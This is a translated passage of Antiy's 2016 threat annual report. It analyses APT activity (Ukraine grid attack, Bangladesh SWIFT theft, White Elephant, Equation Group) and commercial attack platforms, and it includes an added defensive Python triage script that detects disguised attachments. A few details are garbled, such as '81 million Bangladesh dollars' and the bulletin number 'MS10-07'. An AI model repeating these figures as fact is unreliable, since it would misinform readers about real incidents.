A Review and Outlook on Cybersecurity Threats in 2016

1. Striving to Make Our Thinking Relevant to the Times (Introduction)

In the development of China’s cybersecurity, 2016 was marked by numerous milestones: General Secretary Xi Jinping delivered an important speech at the Cyberspace Affairs Work Conference on April 19; the Cybersecurity Law was formally adopted, emphasizing the comprehensive strengthening of defenses for critical infrastructure; and the 13th Five-Year Plan put forward the new requirement of “independence and advancement”… A clear horizon for the future is unfolding in the distance. For China’s cybersecurity professionals, if the past decade or so of trial-and-error progress was more akin to a process of gathering strength for this “great era”, then 2016 officially raised the curtain on a new era. Whether for “optimistic stalwarts”, “pessimistic quitters”, or “temporary transitioners”, this era has truly arrived.

Against this backdrop, the official release dates of Antiy’s annual “Antiy Basic Threat Annual Report” and “Antiy Mobile Threat Annual Report”, which they have consistently adhered to, have been repeatedly postponed. The Mobile Threat Annual Report was finally released on March 10th. The release of the Basic Threat Annual Report comes a full 90 days after we distributed a pre-release version to participants at Antiy’s 4th Cybersecurity Winter Training Camp in January of this year. In other years, such delays and constant revisions might have stemmed from our respect for technology and vigilance against threats. However, this time, our repeated revisions reflect our self-reflection and examination: have our actions kept pace with our thinking, and is our thinking adapted to this era?

Since 2014, we have set a self-imposed requirement for “viewpoint-based annual reports”. We need our own perspective, stance, and analytical predictions. We abandoned the traditional template-based “statistical” annual reports constructed from backend malware data output. We are well aware that those “spectacular” statistics, precise down to behavior and static labels, while seemingly impressive, lack sufficient reference value. Using the number of scans to measure threat severity, while still effective for some types of risks, is a product of the worm and DDoS era, masking more serious and insidious threats. But is simply having this awareness of viewpoint-based annual reports enough? We looked back at Antiy’s own annual reports from previous years. Amidst descriptions filled with idioms like “complete shift”, “increasingly serious”, “constantly emerging”, and “coming one after another”, did they truly reveal the current state and trends of the threats?

In this annual report, we very cautiously and soberly present the following thoughts and viewpoints:

The history of “APT behavior” predates the history of the term “APT”. The “frequent occurrence” of APT incidents we see today is largely due to increased media attention and the focus of security resources on APT attacks. We believe the most accurate description of the trend in APT attacks is that they are a common occurrence in cyberspace, with the increase primarily driven by emerging target scenarios and the continuous entry of new players.

The focus of APT attacks on critical information infrastructure is both a trend and an established fact. For super attackers, critical information infrastructure has always been a key target of APT attacks. These attacks revolve around continuous information acquisition and battlefield pre-preparation. In this process, CNE (Cyber Network Exploitation) behavior is a prerequisite for CNA (Cyber Network Attack).

Commercial attack platforms, commercial Trojans, and vulnerability exploitation tools have significantly reduced the cost of APT attacks while increasing the difficulty of tracing them. The proliferation of commercial weapons first leads to chaos at the bottom of the pyramid, and uncontrolled commercial weapons are more conducive to consolidating a single-level world.

Generalizing the concept of APT to all attacks using sophisticated methods and techniques is irresponsible. APT analysis that does not consider the attacker’s intent and determination is not reliable. Conversely, sophisticated cyberattacks do not necessarily use sophisticated techniques and equipment. APT attackers hijacking ordinary malicious code, including completely disguising themselves as ordinary cybercriminals, may become a trend.

IT development, incomplete IT infrastructure and the “small-scale production” approach to IT construction have resulted in serious inherent deficiencies in architectural security and passive defense, which is one of the fundamental reasons for China’s insufficient risk response capabilities. We not only need to guard a long and vulnerable border, but also possess numerous “defense islands” and scattered points. Without further synchronized development of IT and security, and without “security and development advancing in tandem”, effective security defense will remain impossible.

Simply following the practices of Silicon Valley’s security industry is insufficient to effectively address the APT risks faced by China. Silicon Valley’s security explorations largely focus on proactive defense and enhanced threat intelligence, given that basic security investments by government and enterprise clients in developed countries have already yielded substantial value. However, advanced security measures divorced from these fundamental capabilities are ineffective. From a specific risk countermeasure perspective, the physical advantages of super-attackers on the channel side, combined with their operational characteristics that integrate traditional human and electromagnetic capabilities, significantly diminish the detection value of C&C and file hash beacon-type threat intelligence.

The combination of “physical isolation, the assumption of good faith, and regulations” creates a false sense of security and serves as a form of self-reassurance. While network segmentation strategies and isolation measures are undoubtedly necessary security measures, they may pose even greater security risks if not accompanied by stronger internal network security policies. Security policies and investments must be implemented on the premise that the internal network has already been breached and that “insiders” are already present.

The individual tragedies caused by the black market’s big data are just the tip of the iceberg. The current total amount of data loss has already created a near-universal profiling capability, enabling “threat intelligence counter-operation” and establishing high-precision single-point strikes, thus posing significant national security risks. Uncontrolled information collection, the fragmentation of information assets, and the lack of a clear accountability system are the main reasons the risk is accelerating.

Malware on traditional Windows PCs has begun to decline, while malware in emerging scenarios such as mobile continues to grow at an accelerating pace. At the same time, the stealth and anti-analysis capabilities of advanced malware are constantly improving across various platforms.

Threat intelligence is not just a defensive resource; it is also intelligence about threats, a shared domain for both attackers and defenders. The same data can be rules and clues for the defender, but attack resources and traces for the attacker.

Ransomware (“extortionists”) represents a prevalent and concerning type of malicious code activity. From its early origins as email malware, it has evolved to overlap with botnets, worms, website penetration, intranet propagation, and mobile viruses, impacting not only individual users but also government and enterprise networks. It is no longer just a type of malware but has become a typical example of a black market economic model.

The widespread worm infection incidents involving IoT devices should not be viewed simply as springboards for DDoS attacks. The compromised devices themselves possess greater resource depth value, which is more dangerous than using them in DDoS attacks. The widespread vulnerability of IoT devices poses more insidious and greater risks to social and national security; these risks are simply less easily perceived.

Today, from the perspective of supply chain security, many attacks still take an “indirect route” from upstream to downstream. Supply chain defense, as an extension of high-value scenario defense, has gradually been accepted by security managers. However, it is insufficient to simply view supply chain risks as external risks to achieving key objectives. The supply chain is not only an entry point for attacks but also a crucial target in itself. The main battlefield for cyberspace attack and defense in the future will revolve around the “supply chain” and “big data”.

Faced with threats and challenges, Antiy will choose to become a security vendor with a systematic vision and solutions. Based on its independently developed core technologies and products for threat detection and defense, Antiy will promote the effective integration of proactive defense, threat intelligence, architectural security, and passive defense. Antiy aims to provide attackers with unpredictable security capabilities at difficult-to-bypass attack points, achieving effective protection, high automation, and actionable security business value. This will be the path Antiy has chosen for the future.

2. The Prevalence of Advanced Persistent Threats (APTs) Is a Common Occurrence in Cyberspace

Figure 1 Temporal and Geographic Distribution of APT Incidents That Occurred and Were Disclosed in 2016

The year 2016 began in the aftermath of the cyberattack on Ukraine’s national power grid. In the months that followed, security firms around the world disclosed numerous APT incidents, such as Blockbuster, OnionDog, and C-Major; in July, the “Patchwork” group became the focus of widespread attention, with multiple security firms releasing analysis reports on the organization; by year’s end, as the “Shadow Brokers” continued to leak new information and security firms like Antiy released their stockpiled reports, the full scope of the “Equation” group’s capabilities across all platforms was gradually pieced together. However, as more incidents are examined along their chronological timeline, it becomes clear that using clichés like “increasingly severe” or “becoming a trend” to describe APT attacks is actually irresponsible. The frequent exposure of APT attacks is largely due to the fact that, after becoming the focus of international media attention, they attracted more security analysis resources. Although the term “APT” was first coined in 2006, when applying this standard to assess older attack activities (such as the Equation Group’s attacks on global server nodes beginning in 2000), we can conclude that APT attacks have always been a constant presence in cyberspace. The future growth in such attacks will primarily stem from two factors: first, the increasing digitization of both emerging critical information infrastructure and traditional infrastructure; second, the lowering of barriers to entry for new attackers due to the expanding attack surface and decreasing costs of launching attacks. At the same time, the detection, tracing, exposure, and containment of APT attacks across the entire network have also become routine countermeasures.

2.1 Critical Information Infrastructure Is a Primary Target of APT Attacks

Although the “attack on Ukraine’s power grid”[1] occurred in late 2015, it was not until early 2016 that teams such as SANS ICS[2], ESET[3], and Antiy completed a thorough analysis of the incident. Several related incidents involving intrusions at Ukrainian airports, mining companies, rail transit systems, and television stations were also gradually exposed in early 2016. Similarly, the “Stuxnet” incident from a decade ago—which also drew global attention for its use of cyber methods and malicious code to attack critical infrastructure—serves as a useful point of reference. It demonstrates that as the internet integrates more rapidly with critical infrastructure, while bringing improvements in efficiency, cost reductions, and service convenience, the attack surface of critical infrastructure continues to expand, and the cost of launching attacks continues to decline. In its special report, *Comprehensive Analysis Report on the Attack on Ukraine’s Power Grid* [1], Antiy conducted a comparative analysis of the key elements of these two incidents:

* Note: Although Stuxnet was exposed in 2010, its implementation began in 2006, so we refer to it as ten years ago.

Table 1 Comparison Between the Stuxnet Attack and the Attack on the Ukrainian Power System

| | Stuxnet Incident | Attacks on Ukraine’s Power System |
|---|---|---|
| Main Attack Target | Iranian nuclear industrial facilities | Ukraine’s power system |
| Organizations Associated with the Attack Target | Foolad Technic Engineering Co. (manufactures automation systems for industrial facilities in Iran); Behpajooh Co., Elec & Comp. Engineering (develops industrial automation systems); Neda Industrial Group (provides automation services for the industrial control sector); Control-Gostar Jahed Company (industrial automation company); Kala Electric (a major supplier of uranium enrichment centrifuge equipment) | Kyiv Boryspil Airport (Ukraine’s largest airport); a Ukrainian mining company; Ukrainian railway operators; Ukraine’s state-owned power company, Ukrenergo; Ukraine’s TBS television station |
| Target Systems | Host computer (Windows, WinCC), PLC control system, PLC | Office computer (Windows), host computer (Windows), Ethernet-serial gateway |
| Consequences | Delayed Iran’s nuclear program, causing it to miss a historic opportunity to become a nuclear-armed state | Widespread power outage in Ukraine’s Ivano-Frankivsk region |
| Core Attack Principle | Modify centrifuge pressure parameters and centrifuge rotor speed parameters | By controlling the SCADA system, directly operate the interface and issue power-off commands |
| Vulnerabilities Used | MS08-067 (RPC remote execution vulnerability); MS10-046 (shortcut file parsing vulnerability); MS10-061 (printer spooler service vulnerability); MS10-07 (kernel-mode driver vulnerability); MS10-092 (Task Scheduler vulnerability); WinCC hard-coded password | None found |
| Attack Entry Point | USB ferry; personnel implantation (speculation) | Emails containing malicious macro code |
| Pre-Attack Information Collection and Environmental Pre-Configuration | Possibly related to Duqu and Flame | Integrated data collection and strike |
| Communication and Control | Highly secure encrypted communication and control system | Relatively simple |
| Malicious Code Modules | Large and sophisticated modular system with a high degree of reusability | Modular and reusable |
| Anti-Analysis Capability | High-strength local encryption, complex calling mechanism | Relatively simple and easy to analyze |
| Digital Signature | Stole digital signatures from three major vendors | Digital signatures not used |
| Attack Cost | Extremely high development and maintenance costs | Relatively low |

The joint analysis team led by Antiy concluded that this was a cyberattack targeting power infrastructure; using malicious code such as BlackEnergy as the primary attack tool; conducting preliminary data collection and environmental pre-configuration through a botnet system; sending malicious code payloads via email as the direct entry point for the final attack; issuing commands to remotely control SCADA nodes to cut off power; achieving delayed recovery and state blinding by destroying and damaging the SCADA system; and using DDoS service calls for interference, ultimately achieving a prolonged power outage and creating social chaos—a cyberattack of information warfare caliber. The “attack on the Ukrainian power system” fully illustrates the vulnerability of modern social infrastructure. While the attack equipment may seem less sophisticated compared to Stuxnet from a few years ago, it still achieved its tactical mission. If A2PT (advanced APT) attacks like Stuxnet showcase more about zero-day attacks, complex and robust encryption strategies, PLCs, and firmware, then the “victory” of the attack on the Ukrainian power system was achieved by the attackers without using any zero-day attacks or attack components located on the production system side, but solely through malicious code operating on the PC. From a cost-effectiveness perspective, this is an operation that better illustrates the “violent aesthetics” of war.

Figure 2 Summary of the “Attack on the Ukrainian Power Grid” Incident

The cyberattack on the Central Bank of Bangladesh, which resulted in the theft of 81 million Bangladesh dollars, was a widely publicized attack on financial infrastructure in 2016. Following this, other cyberattacks targeting banks’ SWIFT systems were gradually revealed. Among domestic security vendors, 360 Enterprise Security conducted more analysis and disclosure than Antiy. The attacking group was very familiar with the target bank’s business processes and conducted a long-term, highly targeted, and continuous analysis of the target. Through analysis of the origins of the malware used against the Central Bank of Bangladesh and Tien Phong Bank in Vietnam, it can be inferred that the attacking group is related to the Lazarus organization.

In the hack of the Central Bank of Bangladesh, attackers gained access to the SWIFT system and executed business operations through cyberattacks. They bypassed security verification by modifying SWIFT’s verification code with malicious code and tampered with message data to conceal illegal transfers. The effective use of these attack methods fully exposed the inherent security vulnerabilities of the banking system. Traditional banks rely heavily on closed physical isolation for security. However, with the continuous development of online finance, the increasing number of transaction and payment gateways, numerous dispersed ATM nodes, and more interbank remittances have made cyberattacks on banks a widespread reality, far more than a prediction.

The protection of critical information infrastructure should be put in place before an attack occurs, rather than relying entirely on “incidents” to drive it. Many attacks against critical information infrastructure are highly covert, and these attacks revolve around continuous information acquisition and battlefield pre-preparation. In this process, CNE (Cyber Network Exploitation) behavior is normalized and is a prerequisite for CNA (Cyber Network Attack).

2.2 Hybrid Attacks Combining Online and Offline Methods Are Common in Advanced Cyberattacks

Another important characteristic of the “attack on the Ukrainian power system” is that the attackers used a combination of online and offline methods. They caused infrastructure failures through cyberattacks, while simultaneously interfering with emergency response capabilities and increasing recovery costs by launching denial-of-service attacks on emergency response telephone lines.

Figure 3 Diagram of Online and Offline Attack Operations in the “Attack on the Ukrainian Power Grid” Incident

The “Equation Group” was discovered in 2009 to be using offline attack methods to extend its operations. They would mail CDs containing malicious code disguised as normal meeting materials, infect target hosts through the CD’s self-booting code, and then complete the entire attack through a series of online attacks.

As our understanding of risks deepens, extending from the internet to cyberspace, we need to recognize that our traditional thinking—separating the security of the virtual world from that of the physical world—and our traditional obsession with clearly distinguishing cyber risks from real-world risks will be shaken. What we will see are simply the various attack methods employed by attackers to achieve their objectives. Whether the attack is purely network-based or combines traditional physical and electromagnetic means in its attack path is merely a matter of weapon selection by advanced attackers.

From the perspective of the evolution of security threats, traditional physical space and cyberspace have always been interconnected. Early hacker attacks on mainframe systems often relied on infiltrating offices to conduct reconnaissance, much like Kevin Mitnick disguising himself as a cleaner to steal computer manuals in the last century. However, with the widespread adoption of the internet, this reconnaissance gradually overcame geographical limitations and decreased in cost. The convergence of cyberattacks and traditional attacks follows two paths. For those accustomed to working online, cyberattacks are merely a way for attackers to gain psychological security, gradually leading them to confront cyber risks and threats head-on as they test the limits of social and legal boundaries. On the other hand, traditional terrorist organizations and criminal gangs are constantly seeking new opportunities. When there is sufficient overlap between the two, the convergence of these two evils becomes inevitable.

In future cyberspace competition, combined online and offline attacks will become increasingly common.

2.3 Cybersecurity Capabilities Are Ultimately Tested by Attackers and Eavesdroppers

Currently, countries around the world have implemented numerous cybersecurity inspection and assessment systems to identify security issues and improve security capabilities. However, advanced cyberattacks continue to succeed. While compliance security checks and measures are essential, they cannot replace real-world testing. In China’s response to overseas APT attacks, we also face the reality that, from a technical perspective, even attackers with limited capabilities can pose a significant threat.

On July 10, 2016, based on four years of continuous surveillance and tracking, Antiy exposed the “White Elephant” attack group and released the article “The White Elephant’s Dance – Cyberattacks from the South Asian Subcontinent”. [4] Samples from this attack group were first captured and discovered by Antiy in July 2012. In May 2013, the Norwegian security vendor Norman named this group HangOver and determined that its main target was Pakistan, while it also threatened China to a certain extent. Antiy called the group “White Elephant”. Through continuous analysis, Antiy found that the main attack direction of this group has shifted from Pakistan to China, which reflects a change in the strategic goals and strategic stages of the group and the country behind it. The group’s attack wave capability in 2016 was significantly improved compared to the previous one. Therefore, Antiy called this wave of attacks “White Elephant Generation II”. “White Elephant Generation II” is more advanced in technical means than “White Elephant Generation I”. The improvement in the overall and technical capabilities of its attack operations may lead to an increase in the success rate of its attacks, and its use of more violent and barbaric delivery methods makes its number of attacks and the scope of its impact far greater than those of “White Elephant Generation I”.

Table 2 Comparative Analysis of “White Elephant Generation 1” and “White Elephant Generation 2”

| | White Elephant Generation 1 | White Elephant Generation 2 |
|---|---|---|
| Main Threat Targets | Large-scale targets in Pakistan and a few targets in China (such as universities) | Large-scale targets in Pakistan and China, including various targets related to education, military, scientific research, and media |
| Initial Attack Methods | Spear-phishing emails with direct attachments | Spear-phishing emails containing links to documents that exploit file-format vulnerabilities |
| Types of Stolen Files | *.doc *.docx *.xls *.ppt *.pps *.pptx *.xlsx *.pdf | *.doc *.docx *.xls *.ppt *.pptx *.xlsx *.pdf *.csv *.pst *.jpeg |
| Social Engineering Skills | PE files use double extensions and embedded images, disguised as military intelligence documents or court judgments; rather crude | Forgery of relevant military and political information is quite sophisticated |
| Vulnerabilities Used | None observed | CVE-2014-4114, CVE-2012-0158, CVE-2015-1761 |
| Binary Attack Payload Development and Compilation Environment | VC, VB, Dev-C++, AutoIt | Visual C#, AutoIt |
| Binary Attack Payload Packing | A small number packed with UPX | Not packed |
| Digital Signature Theft / Counterfeiting | Not seen | Not seen |
| Estimated Size of the Attacking Organization | 10-16 people, with varying skill levels | A small squad with high attack capabilities |
| Threat Consequence Assessment | Caused certain threatening consequences | May cause serious consequences |
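As an added illustration of the Generation 1 tradecraft listed in Table 2 (a PE file given a document-plus-executable double extension, a PE file hiding behind a document extension, and UPX packing), the following Python triage routine applies those three heuristics to mail attachments. This is example code, not Antiy’s, and every attachment it inspects is a constructed sample rather than a real White Elephant file.

```python
# Attachment triage heuristics modelled on the "White Elephant Generation 1"
# characteristics in Table 2. Added example, not Antiy's code; all sample
# attachments below are constructed for illustration.
from dataclasses import dataclass

# Document extensions taken from the table's "Types of Stolen Files" rows.
DOC_EXT = {"doc", "docx", "xls", "xlsx", "ppt", "pps", "pptx", "pdf", "csv", "pst", "jpeg"}
# Extensions Windows will execute when double-clicked.
EXEC_EXT = {"exe", "scr", "com", "pif", "bat", "cmd"}


@dataclass
class Attachment:
    name: str
    data: bytes


def is_pe(data: bytes) -> bool:
    """True if data carries an MZ header whose e_lfanew points at a PE signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    pe_off = int.from_bytes(data[0x3C:0x40], "little")
    return data[pe_off:pe_off + 4] == b"PE\x00\x00"


def is_upx_packed(data: bytes) -> bool:
    """Crude check for the default UPX section names near the PE section table."""
    head = data[:4096]
    return is_pe(data) and (b"UPX0" in head or b"UPX1" in head)


def triage(att: Attachment) -> list[str]:
    """Return the heuristic findings for one attachment (empty list = nothing seen)."""
    findings = []
    exts = att.name.lower().split(".")[1:]
    last = exts[-1] if exts else ""
    # Gen 1: "court_judgment.doc.exe" style double extension on an executable.
    if len(exts) >= 2 and last in EXEC_EXT and exts[-2] in DOC_EXT:
        findings.append("double-extension executable posing as a document")
    # A real PE delivered under a document extension.
    if last in DOC_EXT and is_pe(att.data):
        findings.append("PE file behind a document extension")
    # Gen 1 payloads were occasionally UPX-packed.
    if is_upx_packed(att.data):
        findings.append("UPX-packed PE")
    return findings


def fake_pe(packed: bool) -> bytes:
    """Build a minimal constructed PE header: MZ stub, e_lfanew=0x40, PE signature."""
    hdr = bytearray(b"MZ" + b"\x00" * 0x3A)            # DOS header up to e_lfanew
    hdr += (0x40).to_bytes(4, "little")                  # e_lfanew -> offset 0x40
    hdr += b"PE\x00\x00" + b"\x00" * 20                  # signature + empty COFF header
    if packed:
        hdr += b"UPX0" + b"\x00" * 36 + b"UPX1" + b"\x00" * 36  # section names
    return bytes(hdr)


# Constructed samples: a "court judgment" with a double extension, a packed PE
# behind a document name, and a benign Office file (OOXML files start with "PK").
SAMPLES = [
    Attachment("court_judgment.doc.exe", fake_pe(packed=False)),
    Attachment("intel_brief.pdf", fake_pe(packed=True)),
    Attachment("minutes.docx", b"PK\x03\x04" + b"\x00" * 60),
]


def triage_all(samples=SAMPLES) -> dict[str, list[str]]:
    """Map each attachment name to its findings."""
    return {a.name: triage(a) for a in samples}


if __name__ == "__main__":
    for name, hits in triage_all().items():
        print(f"{name}: {hits or 'clean'}")
```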

Through long-term and in-depth analysis, Antiy tracked down clues about the attack organization and created an attacker profile based on publicly available information on the Internet, concluding that it was an attack group consisting of 10 to 16 people.

Figure 4 Profile of the “White Elephant Generation 1” Attack Group

Over the past few years, China’s information systems and users have faced continuous challenges from multi-party cyber intrusions. These attacks employ a variety of sophisticated (and seemingly less sophisticated) techniques, primarily targeting the acquisition of confidential information, research findings, and other secrets. These attack groups have persisted in critical infrastructure and information systems for extended periods, aiming to steal secrets and gain greater operational initiative. The potential threat and the depth of their impact far surpass those of website tampering or traditional DDoS attacks. These attacks also exhibit different methods and characteristics depending on the strategic intent, capabilities, and priorities of the perpetrators. While Chinese users are more concerned about attacks from a superior, overarching perspective, our analysis of “White Elephant” reveals that cyberattacks from countries and regions with competing geopolitical interests also pose significant risks and challenges to China’s informatization. Moreover, while these attacks often appear somewhat crude, they are more frequent, direct, and persistent.

Attack groups like “White Elephant”, lacking network and electromagnetic capabilities for cover, rely more on internet entry points like email. From a holistic defense perspective, this is a point that could be tightened, but for a society with insufficient basic perception, detection, and defense capabilities, such targeted remote attacks are highly effective and are drowned out by a large number of other non-targeted security incidents.

A current situation warrants reflection: advancing and conducting cybersecurity exercises in a state of “no adversaries”. The combination of “physical isolation + the assumption of good guys + prescribed scenarios” creates a false sense of security and self-comfort. While network partitioning and isolation measures are undoubtedly essential and necessary security strategies, they may pose greater security risks if not accompanied by stronger internal network security strategies. Security strategies and investments must be implemented based on the premise that the internal network has been penetrated and an “insider” already exists.

A great power’s defense capabilities are guided by design, based on industry, and complemented by investment, but ultimately their true level must be tested in real confrontations with attackers and spies.

2.4 The Attack Payload of the Advanced Cyberattack Group Is Capable of Targeting All Platforms

Following Kaspersky and Antiy’s analyses and exposure of the malware used by the Equation Group in early 2015, the group resurfaced in a series of events in 2016. In August and October 2016, a hacker group calling itself the “Shadow Brokers” released information suggesting a connection between the Equation Group and the ANT attack equipment previously exposed by Snowden, demonstrating its ability to inject and persist malware into firewalls such as Cisco, Juniper, and Fortinet. Shadow Brokers revealed that the Equation Group had been compromising numerous servers worldwide since 2000, including some versions of Solaris and Oracle-owned Unix operating systems. Although no concrete evidence was provided, this corroborated Antiy’s analysis, revealing a near-omnipresent, platform-wide attack capability of this super-attacking group. In response, Antiy released “From “Equation” to “Equation Group”—An Analysis of the Cross-Platform Capabilities of the EQUATION Hacking Group’s Advanced Malware” on November 4, 2016.[5] The report exclusively analyzed its attack samples on the Solaris and Linux platforms, which is the first publicly available analysis in the industry to officially confirm the existence of these “evil spirits”.

Figure 5 Global Server Intrusions by the Equation Group, As Revealed by Shadow Brokers Between 2000 and 2010

Over the past few years, this analysis has been so lengthy, complex, and difficult that it has exceeded the challenges we faced in analyzing and reproducing Stuxnet and Flame. This highly complex, stealthy, and versatile advanced malware presents a significant challenge to both victims and analysts. Especially when its attack scope covers almost all architectures and operating systems, traditional security analysis teams, which are more adept at analyzing malware on mainstream operating system platforms such as Windows, Linux, and Android, have clearly felt immense pressure and challenges. If we use the organization’s name, “Equation”, as an analogy to describe the difficulty of the analysis, what we need to crack is no longer just a single “equation”, but a more complex system of multiple equations. By reviewing the main analytical results and revelations about the “Equation” group, we can see a chart illustrating the organization’s multi-platform operating system coverage capabilities:

Table 3 Multi-Platform Operating System Coverage Capabilities of the Equation Group

| Information | Windows | Linux | Solaris | Oracle-owned Unix | FreeBSD | Mac OS |
|---|---|---|---|---|---|---|
| Antiy: A Trojan That Modifies Hard Drive Firmware: Exploring the Attack Components of the EQUATION Group [6] | Analysis of sample payload and disk persistence capabilities | | | | | |
| Antiy: Analysis of Encryption Techniques in Some Components of the Equation [7] | Analysis of encryption algorithms | | | | | |
| Kaspersky: Equation: The Death Star of Malware Galaxy [8] | Unveiling the Equation attack organization | | | | | |
| Kaspersky: A Fanny Equation: “I am your father, Stuxnet” [9] | Fanny component analysis | | | | | |
| Kaspersky: Equation Group: from Houston with love [10] | DoubleFantasy analysis | | | | | |
| Kaspersky: EQUATION GROUP: QUESTIONS AND ANSWERS [11] | Equation organization: questions and answers | | | | | Inferred |
| The Hacker News: Shadow Brokers reveals list of Servers Hacked by the NSA | | | Exposure exists | Exposure exists | Exposure exists | |
| Antiy: From “Equation” to “Equation Group”: An Analysis of the Cross-Platform Capabilities of the EQUATION Hacking Group’s Advanced Malware [5] | | Exposure exists; stage payloads analyzed | Existence confirmed; related payloads analyzed | | | |

Note: Antiy’s analysis of the User Agent in the Solaris sample revealed that it carried the Solaris identifier, while Kaspersky disclosed in “EQUATION GROUP: QUESTIONS AND ANSWERS” that it had captured information about a Mac OS X User Agent. Therefore, although Antiy, Kaspersky and other vendors have not yet captured Mac OS X samples, the Equation Group’s attack payloads targeting Mac OS X are real.

Antiy hopes to demonstrate to users through its work that the various reports about super-attack groups’ ability to cover all platforms are not just rumors, but a real threat and an established fact. This weapon is used not only to attack traditional high-level targets within isolated networks, but also to attack internet nodes.

In China’s security defense practices, there’s a preconceived notion that due to various regulations and constraints, nodes exposed to the internet, and even internal networks with internet access, do not store high-value information. The idea that “all valuable information resides within isolated networks” is a beautiful vision and imagination, but not the reality of this era of massive information generation and rapid flow. Furthermore, in the era of big data, the definition and scope of high-value information are constantly evolving. More information assets are inevitably distributed within public network systems, and the spying and attacks on these assets are continuously increasing. Super-attack organizations are the instigators and long-term practitioners of such attacks.

An intrusion into a DNS server can facilitate the injection of malicious code and the interception of communications targeting other network assets; an attack on a mail server can allow attackers to intercept all of a user’s email communications; and establishing a persistent presence on an ISP’s backbone node can be used to obtain comprehensive information, including achieving what the Camberdada [12] project described as an “easy win”.

Note: Project Camberdada is a surveillance operation plan exposed by Snowden. The relevant agencies monitored emails sent by users to antivirus vendors through persistent nodes of operators in order to discover whether their attacks were exposed and to capture and reuse samples deployed by other parties.

As we summarized earlier, these super-attack groups possess “organized cyberattack teams, a massive support engineering system and a standardized arsenal of attack tools, powerful vulnerability collection, analysis and mining capabilities, related resource reserves, and systematic operating procedures and manuals. Their equipment system covers all scenarios, their vulnerability exploitation tools and malicious code payloads cover all platforms, and their persistence capabilities cover all stages. Faced with such a systematic attack, which is both industrial-grade and highly targeted, the ‘perpetual motion machine’ is destined to stall, and the ‘silver bullet’ is destined to fail. To achieve effective defense and trace the source, only a clear strategy, sufficient cost investment, and a systematic defense against a systematic attack, through long-term, arduous, and solid work and capacity building, can gradually gain the initiative”.

2.5 Commercial Cyber Weapons Further Reduce the Cost of APTs

In the context of cybersecurity, “commercial weapons” refer to attack platforms, malicious code, vulnerabilities and their exploitation tools, as well as other tools or components used to facilitate attacks, which are sold and traded as commercial products and possess weapon-grade capabilities. These include commercial attack platforms such as Cobalt Strike, as well as exploit kits such as RIG and Magnitude. In “Analysis of Samples from a Quasi-APT Attack Targeting Chinese Government Agencies” [13], Antiy thoroughly analyzed the role played by the commercial attack platform Cobalt Strike in the attack and pointed out that “commercial attack platforms eliminate the need for attackers to incur high costs for developing malicious code; these platforms also provide attackers with a wide range of injection methods and supporting techniques for loading and persisting malicious code. This approach reduces the cost of attacks, enabling nations and organizations lacking substantial funding or elite hackers to carry out near-APT-level attacks by relying on services provided by existing commercial attack platforms; moreover, such highly ‘formulaic’ attacks lack distinctive signatures, making them harder to trace.” Throughout 2016, traces of Cobalt Strike were repeatedly observed in APT attacks targeting China, and our industry partner 360 Enterprise Security published a follow-up analysis report on this [14].

Commercial arms typically have the following characteristics:

  • At the level of a weapons-grade product.

Commercial weaponry is not simply malicious code or vulnerability intelligence; it comprises weapon-grade attack equipment. Take Cobalt Strike, for example. While it claims to be a commercial version of the open-source vulnerability testing platforms Metasploit and Armitage (Metasploit’s graphical interface), its payload capabilities are designed entirely for real-world use. It can deliver payloads covering all operating system platforms, includes a large number of constructible overflow formats, and enables payloads to achieve non-local sample delivery, encrypted transmission of stolen data, and remote encrypted control. It is not a typical vulnerability scanning and testing platform, nor the target missile its manufacturer describes; it is a real missile with combat objectives.

  • High-value-added transactions are the link that maintains the supply and demand relationship in the commercial arms trade.

While commercial weaponry repeatedly appears in APT attacks, its supply is a commercial activity, not an official act by attack groups like TAO. Furthermore, although the trade in Trojans and vulnerabilities has always existed, commercial weaponry is not the low-quality trading of Trojans or the acquisition of vulnerabilities typical of traditional black market activities. Instead, it represents high-quality attack equipment “commodities”, making such transactions both high-value-added and scalable. For example, it provides actual and effective capabilities, including 0-day exploit tools, rather than basic vulnerability information or Proof-of-Concept (POC). Its Trojans often possess a high degree of modularity and rootkit capabilities.

  • Commercial arms manufacturers often have certain political and economic backgrounds.

Take Raphael Mudge (USA), the creator of Cobalt Strike, for example. He was a security researcher and penetration tester for the US Air Force, and was deeply involved in the Red Team project.

Table 4 Raphael Mudge’s Resume

| Company / Project / Organization | Position | Time |
| --- | --- | --- |
| Strategic Cyber LLC | Founder and Director | 2012.1 - present |
| Delaware Air National Guard | Leader, Reserve Officer | 2009 - present |
| Cobalt Strike | Project Manager | 2011.11 - 2012.5 |
| TDI | Senior Security Engineer | 2010.8 - 2011.6 |
| Automattic | Code Wrangler | 2009.7 - 2010.8 |
| Feedback Army, After the Deadline | Founder | 2008.7 - 2009.11 |
| U.S. Air Force Research Laboratory | Systems Engineer | 2006.4 - 2008.3 |
| U.S. Air Force | Communications and Information Officer | 2004.3 - 2008.3 |

  • Capability flows in the context of commercial arms manufacturing complicate threats.

One characteristic of information weapons is that their replication cost is almost zero. The flow of commercial arms capabilities exhibits certain patterns. On the one hand, events such as Snowden’s leaks and the revelations by “Shadow Brokers” have provided commercial arms with more advanced reference models and templates. On the other hand, events such as the Hacking Team information leak have enabled commercial arms capabilities to quickly reach the level of the underground black market in a short period of time.

Commercial arms are, to some extent, sold as security products for “offense-based defense”, but their impact on information security differs significantly between developed and developing countries. For information systems that have long implemented the defense-in-depth concept, have made effective long-term investments in basic protection measures, and where proactive defense and threat intelligence have taken effect, the impact of commercial arms sales is limited. However, for the information systems of developing countries, it could be disastrous. Therefore, the proliferation of commercial arms sales first leads to chaos at the bottom of the pyramid, and uncontrolled commercial weapons are more conducive to consolidating a unipolar world.

Figure 6 Scope of Commercial Cyberweapons in Cyberattacks

2.6 APT Attacks Do Not Necessarily Use Advanced Attack Equipment and Methods

APT attacks are more easily associated with advanced attack methods, such as the development of proprietary attack tools, the purchase of commercial weaponry, or the use of stolen digital signatures and exploits for unique or purchased vulnerabilities. Because the attack tools and methods used in APT attacks are exposed, they are imitated by other attack groups, underground black market supply chains, and ordinary hackers, making APT attack techniques commonplace. However, APT attacks aim to achieve their objectives, with the ultimate goal of causing damage to or stealing information from targeted individuals; the attack tools and methods used to achieve this ultimate goal are not necessarily advanced.

